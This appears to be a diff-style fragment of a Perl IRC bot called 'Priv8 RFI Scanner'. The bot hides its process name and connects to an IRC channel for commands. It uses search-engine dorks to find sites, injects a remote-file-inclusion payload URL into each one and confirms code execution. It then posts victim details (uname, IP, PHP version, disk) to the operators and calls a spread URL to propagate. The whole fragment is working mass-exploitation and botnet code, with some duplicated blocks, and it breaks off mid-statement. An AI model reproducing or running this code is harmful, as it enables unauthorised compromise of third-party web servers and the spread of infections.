+my $admin     = "My","Aliff"; 
+my $channel   = "#test"; ## the normal chan to scan, and see the results too :P
+my $chanres   = "#test"; ## the channel where u can find all the results of the bot
+my $verz      = "Priv8 RFI Scanner v1.0 beta";
+
+print "\n";
+print "  Priv 8 Scanner\n";
+print "  Author: SeaNet\n";
+print "  Release $verz\n";
+print "  Server $ircserver:$port\n";
+print "  $channel and $chanres\n";
+print "  Enjoy ;)\n\n";
+
+use IO::Socket::INET;
+use HTTP::Request;
+use LWP::UserAgent;
+require LWP;
+$|++;
+
+my $pid = fork;
+exit if $pid;
+$0 = "$process" . "\0" x 16;
+my $dsp = IO::Socket::INET->new(
+    PeerAddr => "$ircserver",
+    PeerPort => "$port",
+    Proto    => "tcp"
+) or die "Can not connect on server!\n";
+$dsp->autoflush(1);
+print $dsp "NICK $nickname\r\n";
+print $dsp "USER infira 8 *  : infira \r\n";
+print $dsp "JOIN $channel\r\n";
+print $dsp "PRIVMSG $channel :9,1Priv8 Scaner Pornit!! \r\n";
+print $dsp "PRIVMSG $channel :8,1Comanda Scan:9,1 !scan bug dork 0,1& 4,1!google bug dork \r\n";
+print $dsp "PRIVMSG $channel :9,1Priv8 RFIScanner powered By SeaNetо \r\n";
+sleep(1);
+print $dsp "NICK $nickname\r\n";
+print $dsp "USER SeaNet *  : SeaNet \r\n";
+print $dsp "JOIN $chanres\r\n";
+print $dsp "PRIVMSG $chanres :9,1Aici vin rezultatele :) \r\n";
+print $dsp "PRIVMSG $chanres :9,1Priv8 RFIScanner powered By SeaNetо \r\n";
+
+while ( $line = <$dsp> ) {
+
+    $line =~ s/\r\n$//;
+    if ( $line =~ /^PING \:(.*)/ ) {
+        print "PONG :$1";
+        print $dsp "PONG :$1";
+    }
+
+    if ( $line =~ /PRIVMSG $channel :!help/ ) {
+        sleep(1);
+        display( $dsp,
+"PRIVMSG $channel :9,1Working ..."
+        );
+        display( $dsp,
+"PRIVMSG $channel :8,1[Ajutor]9,1 Pentru a scana foloseste comanda :4,1 !scan bug dork & !google bug dork"
+        );
+        display( $dsp,
+            "PRIVMSG $channel :8,1[Ajutor]9,1 Pentru informatii server tasteaza: 4,1!info"
+        );
+    }
+
+    if ( $line =~ /PRIVMSG $channel :!info/ ) {
+        my $sysos  = `uname -sr`;
+        my $uptime = `uptime`;
+        if ( $sysos =~ /freebsd/i ) {
+            $sysname = `hostname`;
+            $memory =
+`expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
+            $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
+            chomp($memory);
+            chomp($swap);
+        }
+
+        elsif ( $sysos =~ /linux/i ) {
+            $sysname = `hostname -f`;
+            $memory  = `free -m |grep -i mem | awk '{print \$2}'`;
+            $swap    = `free -m |grep -i swap | awk '{print \$2}'`;
+            chomp($swap);
+            chomp($memory);
+        }
+        else {
+            $sysname = "No Found";
+            $memory  = "No found";
+            $swap    = "No Found";
+        }
+        $uptime  =~ s/\n//g;
+        $sysname =~ s/\n//g;
+        $sysos   =~ s/\n//g;
+        sleep(1);
+        display( $dsp,
+"PRIVMSG $channel :9,1Working ..."
+        );
+        display( $dsp,
+"PRIVMSG $channel :8,1[Info]9,1 Server: $ircserver Port: $port"
+        );
+        display( $dsp,
+"PRIVMSG $channel :8,1[Info] 9,1Software: $sysos"
+        );
+        display( $dsp,
+"PRIVMSG $channel :8,1[Info] 9,1Process/Pid:8,1 $process"
+        );
+        display( $dsp,
+            "PRIVMSG $channel :8,1[Info]9,1 Uptime: $uptime" );
+        display( $dsp,
+"PRIVMSG $channel :8,1[Info]9,1 Memorie: $memory Swap: $swap"
+        );
+        display( $dsp,
+"PRIVMSG $channel :8,1[Info]9,1 Creator: SeaNet"
+        );
+        display( $dsp,
+"PRIVMSG $channel :8,1[Info]9,1 Versiune: $verz"
+        );
+          }
+
+    if ( $line =~ /PRIVMSG $channel :!id/ )
+    {    ## йй Script made by kangkung . Don't remove this comment !
+        my $testid = $id;
+        my $req    = HTTP::Request->new( GET => $testid );
+        my $ua     = LWP::UserAgent->new();
+        $ua->timeout(5);
+        my $response = $ua->request($req);
+        if ( $response->is_success ) {
+            my $re = $response->content;
+            if ( $re =~ /<\?php/ ) {
+                sleep(1);
+                display( $dsp,
+"PRIVMSG $channel :8,1[Info]9,1 Id`ul este online"
+                );
+            }
+        }
+        else {
+            sleep(1);
+            display( $dsp,
+"PRIVMSG $channel :8,1[Info]9,1 Id`ul nu este activ."
+            );
+            display( $dsp,
+"PRIVMSG $channel :8,1[Info]9,1 Modifica setarile cu noul id."
+            );
+            display( $dsp,
+"PRIVMSG $channel :8,1[Info]9,1 Ruleaza din nou scannerul."
+            );
+            display( $dsp,
+"PRIVMSG $channel :8,1[WARNING]9,1 Deconectare initiata."
+            );
+            sleep(2);
+            display( $dsp, "PRIVMSG $channel :8,1[WARNING]9,1 Bye Bye" );
+            display( $dsp, "QUIT" );
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                sleep(1);
+                display( $dsp,
+"PRIVMSG $channel :8,1[Info]9,1Scanare pornita pentru: 4,1$dork"
+                );
+                my @google = &googlet($dork);
+                push( my @tot, @google );
+                my @puliti = &unici(@tot);
+                display( $dsp,
+                        "PRIVMSG $channel :9,1GOOGLE "
+                      . scalar(@tot)
+                      . " 9,1/9,1 "
+                      . scalar(@puliti)
+                      . " 9,1 pentru:4,1 $dork" );
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                        display( $dsp,
+"PRIVMSG $channel :8,1[Info]9,1 Google a terminat pentru:4,1 $dork"
+                        );
+                    }
+                    my $test  = "http://" . $site . $bug . $id . "?";
+                    my $print = "http://" . $site . $bug . $printcmd . "?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: $un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: Free: $free , Used: $used , Total: $all"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1ID: $id1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: $pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Ip Addr: $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                                my $test2 =
+                                  "http://" . $site . $bug . $spread . "?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /kangkung/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                            }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+if ( $line =~ /PRIVMSG $channel :!google\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+     
+                my @google = &googlet($dork);
+                push( my @tot, @google );
+                my @puliti = &unici(@tot);
+                display( $dsp,
+                        "PRIVMSG $channel :8,1[Info]9,1Google ByPASS  "
+                      . scalar(@tot)
+                      . " 9,1/9,1 "
+                      . scalar(@puliti)
+                      . "  9,1pentru4,1 $dork" );
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                        display( $dsp,
+"PRIVMSG $channel :8,1[Info]9,1Google ByPASS a terminanat pentru4,1 $dork"
+                        );
+                    }
+                    my $test  = "http://" . $site . $bug . $id . "?";
+                    my $print = "http://" . $site . $bug . $printcmd . "?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1ID: $id1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode:8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode:8,1Off 9,1Os: $os Link: $print"
+                                );
+                                my $test2 =
+                                  "http://" . $site . $bug . $spread . "?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /kangkung/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :12(4hdd12) 12 Free: ($free) Used: ($used) Total: ($all) "
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :12(4php12) 12 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :12(4software12) 12 $sof1 "
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :12(4server-name12) 12 $name1 "
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                            }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @alltheweb = &alltheweb($dork);
+                push( my @tot, @alltheweb );
+                my @puliti = &unici(@tot);
+                display( $dsp,
+                        "PRIVMSG $channel :9,1ALLTHEWEB  "
+                      . scalar(@tot)
+                      . " 9,1/9,1 "
+                      . scalar(@puliti)
+                      . " 9,1pentru4,1 $dork" );
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                        display( $dsp,
+"PRIVMSG $channel :9,1AllTheWeb a terminat pentru4,1 $dork"
+                        );
+                    }
+                    my $test  = "http://" . $site . $bug . $id . "?";
+                    my $print = "http://" . $site . $bug . $printcmd . "?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1ID: $id1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                my $test2 =
+                                  "http://" . $site . $bug . $spread . "?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /kangkung/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                            }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @uol = &uolsub($dork);
+                push( my @tot, @uol );
+                my @puliti = &unici(@tot);
+                display( $dsp,
+                        "PRIVMSG $channel :9,1UOL  "
+                      . scalar(@tot)
+                      . " 9,1/9,1 "
+                      . scalar(@puliti)
+                      . "   11pentru9,1 $dork" );
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                        display( $dsp,
+"PRIVMSG $channel :9,1UOL a terminat pentru4,1 $dork"
+                        );
+                    }
+                    my $test  = "http://" . $site . $bug . $id . "?";
+                    my $print = "http://" . $site . $bug . $printcmd . "?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1ID: $id1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                my $test2 =
+                                  "http://" . $site . $bug . $spread . "?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /kangkung/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                            }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @altavista   = &altavista($dork);
+                push( my @tot, @allist, @alldeist, @allistus );
+                my @puliti = &unici(@tot);
+                display( $dsp,
+                        "PRIVMSG $channel :9,1ALTAVISTA  "
+                      . scalar(@tot)
+                      . " 9,1/9,1 "
+                      . scalar(@puliti)
+                      . " 9,1pentru4,1 $dork" );
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                        display( $dsp,
+"PRIVMSG $channel :9,1ALTAVISTA a terminat pentru9,1 $dork"
+                        );
+                    }
+                    my $test  = "http://" . $site . $bug . $id . "?";
+                    my $print = "http://" . $site . $bug . $printcmd . "?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1ID: $id1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                my $test2 =
+                                  "http://" . $site . $bug . $spread . "?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /kangkung/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                            }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @searchlist = &search($dork);
+                my @search2    = &searchs($dork);
+                push( my @tot, @searchlist, @search2 );
+                my @puliti = &unici(@tot);
+                display( $dsp,
+                        "PRIVMSG $channel :9,1SEARCH  "
+                      . scalar(@tot)
+                      . " 9,1/9,1 "
+                      . scalar(@puliti)
+                      . " 9,1 pentru4,1 $dork" );
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                        display( $dsp,
+"PRIVMSG $channel :9,1SEARCH a terminat pentru4,1 $dork"
+                        );
+                    }
+                    my $test  = "http://" . $site . $bug . $id . "?";
+                    my $print = "http://" . $site . $bug . $printcmd . "?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
